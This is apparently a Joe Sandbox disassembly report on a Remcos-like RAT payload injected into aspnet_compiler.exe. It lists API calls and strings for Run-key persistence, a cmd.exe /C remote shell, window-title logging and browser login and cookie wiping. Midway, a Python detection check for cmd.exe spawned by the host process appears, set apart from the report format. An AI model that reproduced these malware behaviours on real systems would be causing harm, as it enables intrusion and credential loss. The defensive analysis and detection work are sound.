                                                          • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                          • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                          • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                          • __dosmaperr.LIBCMT ref: 0044AAFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID: `@
                                                          • API String ID: 2583163307-951712118
                                                          • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                          • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                          • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                          • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 00404946
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                          • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                          • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                          • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                          • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                          • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                          • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                          • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                          • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                          • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,762337E0,?), ref: 004127AD
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,762337E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 1818849710-1051519024
                                                          • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                          • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                          • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                          • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                            • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                            • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                          • String ID: bad locale name
                                                          • API String ID: 3628047217-1405518554
                                                          • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                          • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                          • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                          • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                          • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                          • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: Control Panel\Desktop
                                                          • API String ID: 1818849710-27424756
                                                          • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                          • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                          • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                          • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                          • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: TUF
                                                          • API String ID: 1818849710-3431404234
                                                          • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                          • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                          • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                          • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                          • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                          • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                          • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
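The ShellExecuteW record above (verb "open", target cmd.exe, argument prefix "/C ") is the RAT's remote shell, and because the payload runs inside aspnet_compiler.exe (the module name and snapshot file in every record on this page), process-creation telemetry will show a .NET build tool spawning cmd.exe. The check below is an added example, not code from Joe Sandbox or from the sample: it runs over constructed Sysmon Event ID 1 / Security 4688 style records and flags cmd.exe children of the injection host, distinguishing the one-shot /C form from an interactive shell. The host name is the one this report shows; the event records and any extra host names are assumptions.

```python
import ntpath
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (ParentImage, Image, CommandLine)."""
    parent_image: str
    image: str
    command_line: str


# Process hosting the injected Remcos payload on this page. Any further names added here
# (other injection targets) are an analyst's assumption, not something this report shows.
INJECTION_HOSTS = {"aspnet_compiler.exe"}

# Constructed events: one true positive, one benign cmd.exe from Explorer, one legitimate
# compiler child of aspnet_compiler.exe, and one interactive shell from the host.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
              r"C:\Windows\System32\cmd.exe", 'cmd.exe /C "whoami /all"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /C dir"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe", "csc.exe /noconfig /t:library a.cs"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /K"),
]


def _basename(path: str) -> str:
    # ntpath splits on backslashes regardless of the host OS the check runs on
    return ntpath.basename(path).lower()


def shell_spawn_reason(ev: ProcEvent) -> Optional[str]:
    """Return why the event is suspicious, or None if it is not."""
    if _basename(ev.parent_image) not in INJECTION_HOSTS:
        return None
    if _basename(ev.image) != "cmd.exe":
        return None
    # cmd.exe accepts /C and /c; tokenising avoids matching "/c" inside a quoted argument path
    tokens = ev.command_line.lower().split()
    if "/c" in tokens:
        return "one-shot cmd.exe /C from injection host"
    return "interactive cmd.exe from injection host"


def find_shell_spawns(events: Iterable[ProcEvent]) -> List[Tuple[ProcEvent, str]]:
    hits = []
    for ev in events:
        reason = shell_spawn_reason(ev)
        if reason is not None:
            hits.append((ev, reason))
    return hits


if __name__ == "__main__":
    for ev, reason in find_shell_spawns(SAMPLE_EVENTS):
        print(f"{reason}: {ev.parent_image} -> {ev.command_line}")
```

The parent check is deliberately on the image name only: the sample's own string shows the canonical Framework\v4.0.30319 path, but an injected host is still the same binary, so matching the full path would not add signal. The csc.exe event is left unflagged because compiling is what aspnet_compiler.exe does; the /K event is flagged at lower priority since the page only evidences the /C form.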
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetLastInputInfo$User32.dll
                                                          • API String ID: 2574300362-1519888992
                                                          • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                          • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                          • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                          • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                          • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                          • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                          • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                          • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                          • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                          • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                          • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3360349984-0
                                                          • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                          • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                          • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                          • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                          APIs
                                                          Strings
                                                          • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                          • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                          • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                          • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                          • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                          APIs
                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                          • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseOpenQuerySleepValue
                                                          • String ID: @CG$exepath$BG
                                                          • API String ID: 4119054056-3221201242
                                                          • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                          • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                          • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                          • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                          APIs
                                                            • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                            • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                            • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                          • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                          • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                          • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                          • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                          • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                          • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                          • String ID:
                                                          • API String ID: 3604237281-0
                                                          • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                          • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                          • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                          • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                          • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                          • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                          • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                          • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                          • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                          • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                            • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                            • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                          • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                          • String ID:
                                                          • API String ID: 737400349-0
                                                          • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                          • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                          • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                          • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                          • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                          • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                          • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                          • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                          • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                          • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem
                                                          • String ID:
                                                          • API String ID: 4116985748-0
                                                          • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                          • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                          • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                          • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcess
                                                          • String ID:
                                                          • API String ID: 39102293-0
